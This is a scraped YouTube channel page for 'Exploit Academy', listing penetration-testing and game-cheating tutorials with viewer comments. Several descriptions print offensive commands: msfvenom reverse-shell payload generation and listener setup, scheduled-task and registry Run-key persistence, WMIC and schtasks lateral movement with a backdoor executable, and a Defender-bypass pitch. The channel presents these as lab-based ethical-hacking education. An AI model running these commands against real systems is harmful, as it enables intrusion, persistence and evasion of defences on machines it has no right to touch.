Exploit Academy
Exploit Academy
  • Видео 31
  • Просмотров 255 668
Unrestricted File Upload - How to Exploit Web Servers (With DVWA)
In this video we look at exploiting DVWA by leveraging file upload vulnerabilities. Learn how to bypass the low, medium, and high setting in DVWA.
All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed
unless you have permission to do so. These videos are to be performed
within a virtual lab for ethical hacking education only. We are not responsible for any misuse, damages, and or loss of data due to misuse
of this information.
Просмотров: 2 791

Видео

Command Injection - How to Exploit Web Servers (With DVWA)
Просмотров 5 тыс.Год назад
In this video, we're going to be talking about command injection. This is a security vulnerability that allows someone to inject commands into web applications, which can then be executed by the server. Although command injection is not a new vulnerability, it is one that is becoming more and more common in web applications. In this video, we're going to be discussing ways to exploit command in...
How to bypass Windows 11/10 Defender with Hoaxhsell & AmsiTrigger [UNDETECTED]
Просмотров 20 тыс.Год назад
In this video, we'll show you how to bypass Windows 11/10 Defender with Hoaxhsell & AmsiTrigger. These tools are undetectable and can be used to hack into any computer! AmsiTrigger: github.com/RythmStick/AMSITrigger Hoaxshell: github.com/t3l3machus/hoaxshell All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed u...
How to use Scheduled Tasks for Persistence w/ Kali Linux
Просмотров 1,2 тыс.Год назад
Learn how to maintain access in a windows machine by creating a scheduled task that will execute your payload every minute! Enjoy! Command: schtasks /create /tn NAME /tr PAYLOAD /sc SCHEDULE /mo VALUE All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed unless you have permission to do so. These videos are to be...
How to use the Windows Registry for Persistence w/ Kali Linux
Просмотров 1,7 тыс.Год назад
In this video we look at maintaining access to a windows host by abusing the windows registry to automatically execute a reverse shell back to our kali box. Enjoy! Commands: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run \V NAME -d "C:\PAYLOAD" /F Where "NAME" is the name of the registry key, and "PAYLOAD" is the location that points to your backdoor / payload. All material provided...
How to Pivot (Lateral Movement) in Active Directory Using SCM
Просмотров 1 тыс.Год назад
In this video we look at how to pivot within an Active Directory network environment using SCM otherwise known as Windows Service Control Manager. Commands ran in video: to create the payload: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe-service -o ~/Desktop/testservice.exe to create a listener: 1. msfconsole 2. use exploit/multi/handler 3. set LHOST YOUR IP 4. set...
How to Pivot (Lateral Movement) in Active Directory Using Scheduled Tasks
Просмотров 372Год назад
Learn how to pivot inside of an Active Directory (AD) environment by leveraging scheduled tasks to your advantage! Commands: Schtasks /create /s \\192.168.232.124 /tn test /sc once /td 01/01/2000 /ts 00:00 /ru system /tr “C:\setup.exe” To execute the task: Schtasks /s \\192.168.232.134 /run /tn "C:\setup.exe" Enjoy! All material provided on this video and this channel is intended for informatio...
How to Pivot (Lateral Movement) in Active Directory Using WMIC
Просмотров 3,7 тыс.Год назад
Learn how to pivot hosts using WMIC. Command to copy executable to target: copy payload \\target\ (example: copy backdoor.exe \\192.168.1.100\c$) Command to execute payload on target: wmic /node:"target" process call create "\\target\payload\" (example : wmic /node:"192.168.1.100" process call create "\\192.168.1.100\c$\backdoor.exe") (example: copy backdoor.exe 192.168.1.100) Link to FREE wind...
UnrealIRC 3.2.8.1 Remote Code Execution (CVE-2010-2075) with Manual and Metasploit Examples
Просмотров 2,6 тыс.2 года назад
UnrealIRC version 3.2.8.1 vulnerability exploitation. This video shows you how to recreate this exploit both manually and by using Metasploit. More on UnrealIRC: en.wikipedia.org/wiki/UnrealIRCd link to GitHub for the script used in the video: github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor Link for Metasploitable VM: sourceforge.net/projects/metasploitable/ Link for Kali Linux: www.kali....
DistCC 1.0.0 Remote Code Execution (CVE-2004-2687) with Manual and Metasploit Examples
Просмотров 2,1 тыс.2 года назад
Distcc v1 RCE vulnerability exploitation. This video shows you how to recreate this exploit both manually and by using Metasploit. "distcc is a program to distribute builds of C, C , Objective C or Objective C code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile."...
Samba 3.0.20 Arbitrary Command Execution (CVE-2007-2447) with Manual and Metasploit Examples
Просмотров 3,8 тыс.2 года назад
Hacking Samba 3.0.20 - 3.0.25rc3 using the usermap_script exploit for vulnerability CVE-2007-2447. This video shows you how to recreate this exploit both manually and by using Metasploit. link to GitHub for the script used in the video: github.com/amriunix/CVE-2007-2447 Link for Metasploitable VM: sourceforge.net/projects/metasploitable/ Link for Kali Linux: www.kali.org/get-kali/ *DISCLAIMER* ...
vsFTPd v2.3.4 Backdoor Command Execution (CVE-2011-2523) with Manual & Metasploit Examples
Просмотров 11 тыс.2 года назад
Hacking vsFTPd v2.3.4 both manually and with Metasploit. This tutorial is short and straight to the point to help with OSCP and entry level hackers alike. Help support my channel by leaving a like, comment, and subscribe for more! *DISCLAIMER* All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed unless you have ...
Scanning with Nmap Tutorial
Просмотров 6114 года назад
Scanning with Nmap Tutorial
How to Install Parrot OS on VirtualBox (Easy Tutorial)
Просмотров 4,1 тыс.4 года назад
How to Install Parrot OS on VirtualBox (Easy Tutorial)
HOW TO REMOTELY HACK ANDROIDS (Easiest Method!)
Просмотров 2,6 тыс.6 лет назад
HOW TO REMOTELY HACK ANDROIDS (Easiest Method!)
HOW TO CREATE BACKDOORS WITH MSFVENOM (REMOTE ACCESS ANY DEVICE)
Просмотров 2,5 тыс.6 лет назад
HOW TO CREATE BACKDOORS WITH MSFVENOM (REMOTE ACCESS ANY DEVICE)
HOW TO HACK MORE EFFICIENTLY BY USING TERMINATOR
Просмотров 4686 лет назад
HOW TO HACK MORE EFFICIENTLY BY USING TERMINATOR
BEGINNER TIPS FOR RUNNING KALI LINUX INSIDE OF VIRTUALBOX
Просмотров 1666 лет назад
BEGINNER TIPS FOR RUNNING KALI LINUX INSIDE OF VIRTUALBOX
HOW TO INSTALL KALI LINUX 2018 ON VIRTUALBOX IN 5 MINUTES
Просмотров 3 тыс.6 лет назад
HOW TO INSTALL KALI LINUX 2018 ON VIRTUALBOX IN 5 MINUTES
HOW TO SPEEDHACK IN ANY GAME
Просмотров 25 тыс.6 лет назад
HOW TO SPEEDHACK IN ANY GAME
HOW TO HACK RAPID FIRE
Просмотров 14 тыс.6 лет назад
HOW TO HACK RAPID FIRE
HOW TO ORGANIZE YOUR CHEAT TABLE IN CHEAT ENGINE
Просмотров 2,4 тыс.6 лет назад
HOW TO ORGANIZE YOUR CHEAT TABLE IN CHEAT ENGINE
HOW TO TELEPORT IN ANY GAME
Просмотров 9 тыс.6 лет назад
HOW TO TELEPORT IN ANY GAME
HOW TO FIND STATIC ADDRESSES WITH CHEAT ENGINE
Просмотров 113 тыс.6 лет назад
HOW TO FIND STATIC ADDRESSES WITH CHEAT ENGINE
HOW TO SETUP AND USE HOTKEYS IN CHEAT ENGINE
Просмотров 14 тыс.6 лет назад
HOW TO SETUP AND USE HOTKEYS IN CHEAT ENGINE
HOW TO FIND VALUES FASTER WITH DATA STRUCTURES
Просмотров 2,7 тыс.6 лет назад
HOW TO FIND VALUES FASTER WITH DATA STRUCTURES
HOW TO SCAN AND EDIT MEMORY IN GAMES (DYNAMIC ADRESSES)
Просмотров 3,6 тыс.6 лет назад
HOW TO SCAN AND EDIT MEMORY IN GAMES (DYNAMIC ADRESSES)
WHAT YOU NEED TO START HACKING GAMES (EASY)
Просмотров 9636 лет назад
WHAT YOU NEED TO START HACKING GAMES (EASY)
HOW TO HACK ANY GAME WITH CHEAT ENGINE ► DATA TYPES FOR SCANNING
Просмотров 1,9 тыс.6 лет назад
HOW TO HACK ANY GAME WITH CHEAT ENGINE ► DATA TYPES FOR SCANNING

Комментарии

  • @mohamadamora8866
    @mohamadamora8866 День назад

    But you can not solve it in that way man !! you must only stick with high and file upload section only

  • @ReligionAndMaterialismDebunked
    @ReligionAndMaterialismDebunked 5 дней назад

    Shalom.

  • @ReligionAndMaterialismDebunked
    @ReligionAndMaterialismDebunked 5 дней назад

    Shalom.

  • @ReligionAndMaterialismDebunked
    @ReligionAndMaterialismDebunked 5 дней назад

    Very informative! Very beginner-friendly! Shalom. :3

  • @eggsec-i4s
    @eggsec-i4s 13 дней назад

    Thank you for the explanation. I wonder if we can just try to login into the tmp share and send the payload as the user and listen back for the reverse connection?

  • @kirindev
    @kirindev 2 месяца назад

    thank you.

  • @Lethemusicheal
    @Lethemusicheal 2 месяца назад

    Can I ask you Question how a hacker will found the IP Address of the Domain Controller

  • @timecop1983Two
    @timecop1983Two 2 месяца назад

    amazing this guy is a pro hacker

  • @timecop1983Two
    @timecop1983Two 2 месяца назад

    Please make more videos don't give up! 😥

  • @timecop1983Two
    @timecop1983Two 2 месяца назад

    Thanks so easy peasy!

  • @cybersecurity4052
    @cybersecurity4052 2 месяца назад

    there is a very limited amount of content creators out there. which makes what you do even more important. thank you for all that you do.

  • @hroldddp
    @hroldddp 2 месяца назад

    I did this on health, but it works on other entities too. How do I fix it?

    • @hroldddp
      @hroldddp Месяц назад

      nvm it was easy fix

  • @MrT3K_Innovator
    @MrT3K_Innovator 2 месяца назад

    Setup.exe is on your desktop and you copy the file from the shell? How did you do that?

    • @Vrory77
      @Vrory77 2 месяца назад

      The Setup.exe is already at : C:\Users\John.doe thats why he could easy copy from the Windows-Client to the DC. Most ITs have that locked that Files are open to read so thats why some fileshare which everyone can read/write/execute are really importen to find a vurability.

  • @爱情白痴仔
    @爱情白痴仔 3 месяца назад

    hi ! i am trying to find the static address for pes2021,but i always get zero list when i rescan memory with a new dynamic address.do you know the reason for this weird situation?

  • @daleowen92
    @daleowen92 3 месяца назад

    why'd you stop making videos my guy. you make things make sense. appreciate all the vids you've made so far

  • @fluidmind3629
    @fluidmind3629 3 месяца назад

    but when you open the game again the adres i diferent p-> different... why ? where is the static one to copy and use in vb ? thanks

  • @howardduck7066
    @howardduck7066 4 месяца назад

    Nice walkthrough!

  • @Jamaal_Ahmed
    @Jamaal_Ahmed 4 месяца назад

    Thanks bro after 1 year , susbribed ❤🎉 .

  • @DatoXaindrava
    @DatoXaindrava 4 месяца назад

    can u make speedhack or something hack in prime tank pls bro i need :( pls make me happy

  • @KamalnathReddyRamireddygari
    @KamalnathReddyRamireddygari 5 месяцев назад

    More videos brohhh....loving your content .

  • @KamalnathReddyRamireddygari
    @KamalnathReddyRamireddygari 5 месяцев назад

    this video needs a million likes brohh! Thank you, it is crystal clear

  • @timecop1983Two
    @timecop1983Two 5 месяцев назад

    Amazing!!! What don't you make a Udemy course and get more benefit!

  • @sagisar
    @sagisar 5 месяцев назад

    Very good video. Anyway I would thank you really much if you can explain the Python script part by part because I want to understand how exactly this RCE is made of, didn’t found in the internet a full explanation of the vulnerability

  • @scahrahmoosh
    @scahrahmoosh 5 месяцев назад

    Bro make video on genshin. Hk like teleport chast esp open

  • @dotajames91
    @dotajames91 6 месяцев назад

    this one should be in Cheat Engine main tutorial

  • @sankalp9
    @sankalp9 6 месяцев назад

    Wow , this was amazing!! i have been struggling with povoting and have gone through a lot of resources just to end up even more confused😅... but your video made things straight and this technique is going to be part of my arsenal for a very long time , thank you for the work that you do it is quite inspiring ❤️

  • @Md.HusseinSabid
    @Md.HusseinSabid 6 месяцев назад

    What setting are required for a pc with 8gb ROM and 4 cores?

  • @kartheekkandalam2274
    @kartheekkandalam2274 6 месяцев назад

    Hi, Thanks for the complete walkthrough.... For Medium security, Please give me an another way to exploit without using Burpsuite like tools..... Unfortunately my university VM is not opening burpsuite and I need to know if there is any other way to do without an external tool?

  • @basealchemist4396
    @basealchemist4396 6 месяцев назад

    This video was a great help. This should be reccomended at the top

  • @darryls6388
    @darryls6388 6 месяцев назад

    When I run the reg add command, I’m getting “You must specify a keyboath (-k) I’m assuming that’s the key value for the added registry. How do I get that value incorporated into the command for this to work for me?

  • @raulrivero1944
    @raulrivero1944 6 месяцев назад

    I love the video 🎉

  • @fawadbaloch8695
    @fawadbaloch8695 7 месяцев назад

    it helps me to undestand the concept

  • @ihebmahmoud6753
    @ihebmahmoud6753 7 месяцев назад

    is there any alternative way without wasting time and effort

  • @harze6818
    @harze6818 7 месяцев назад

    i get the error check if real time protection is on. which IT IS ! i dont know what to do i tried running as admin aswell and i tried the executionpolicy unrestricted nothing works

    • @harze6818
      @harze6818 7 месяцев назад

      which its not i mean*

  • @ekwewilliam5035
    @ekwewilliam5035 7 месяцев назад

    THANK YOU VERY MUCH YOU ARE THE BEST ❤❤❤❤❤❤❤❤ +1 SUB

  • @naiacnc3173
    @naiacnc3173 7 месяцев назад

    muchas gracias 😉

  • @alirezahhh8
    @alirezahhh8 8 месяцев назад

    It worked, thank you very much, it was great

  • @toshirokirito489
    @toshirokirito489 8 месяцев назад

    im new subscriber this video almost 5 years and working and tested thank you

  • @bird271828
    @bird271828 8 месяцев назад

    Nice video. It would have been more useful if you could show how to escalate daemon's privileges to become root.

  • @red_app1418
    @red_app1418 8 месяцев назад

    after command "ip addr show" im still see my own ip adress im do something wrong?

    • @officialexploitacademy
      @officialexploitacademy 8 месяцев назад

      It's hard to say without seeing what you're doing - try following step by step again and see if you have the same issue

  • @adelmohsn6156
    @adelmohsn6156 9 месяцев назад

    Thanks❤

  •  9 месяцев назад

    Big up on the quality of the tutorial :)

  • @originalbinaryhustler3876
    @originalbinaryhustler3876 9 месяцев назад

    subbed, great content ❤

  • @novianindy887
    @novianindy887 9 месяцев назад

    but we cant open registry for non admin users? 😮

  • @novianindy887
    @novianindy887 9 месяцев назад

    But you need admin priviledge to run task scheduler , right? what if we dont have admin rights?

  • @topetony1431
    @topetony1431 9 месяцев назад

    Thanks for taking time to explain the purpose of the exploit so newbies like me would understand the purpose of the exploit and how to go about it. Just to confirm, the purpose of this exploit is to confirm we are able to break into metasploiter 2 through the FTP service VSFPD right? Please correct me with a good explanation if I am wrong, thanks.

  • @edwardmacnab354
    @edwardmacnab354 9 месяцев назад

    Do you know what an edit is ? will not copy paste --duh ! Figure that out and it's a whole new post. I usually use Crl+c then Ctrl+v to do copy/paste . Perhaps that will solve the problem ?

    • @officialexploitacademy
      @officialexploitacademy 9 месяцев назад

      Ctrl C and Ctrl V wasn’t working. And working with powershell it’s typically not Ctrl c but shift Ctrl c and shift Ctrl V. But thanks for the comment

  • @samislam2746
    @samislam2746 9 месяцев назад

    Great! From Chat GPT: The vsftpd (Very Secure FTP Daemon) exploit you're referring to is likely the backdoor exploit that affected vsftpd version 2.3.4 back in 2011. The vsftpd 2.3.4 version was compromised, and a backdoor was introduced into the official download archive. This backdoor allowed attackers to gain unauthorized access to servers running the affected vsftpd version. The exploit involved an attacker inserting a malicious code snippet into the vsftpd source code hosted on the official server. When users downloaded and installed vsftpd 2.3.4 during the time the compromised version was available, they inadvertently installed this backdoored version. This security incident compromised the vsftpd version 2.3.4 and highlighted the risks associated with downloading software from compromised or untrusted sources. The vsftpd project quickly reacted, removing the compromised version from their servers and releasing a clean version to mitigate the issue. This incident emphasized the importance of verifying the integrity of software downloads, particularly from official and trusted sources, and keeping software up-to-date with security patches to prevent exploitation of known vulnerabilities.

  • @biyem_imm_sankara
    @biyem_imm_sankara 10 месяцев назад

    That was a great video

  • @LEKIPE1
    @LEKIPE1 10 месяцев назад

    How to obfuscate an exe file using this method ?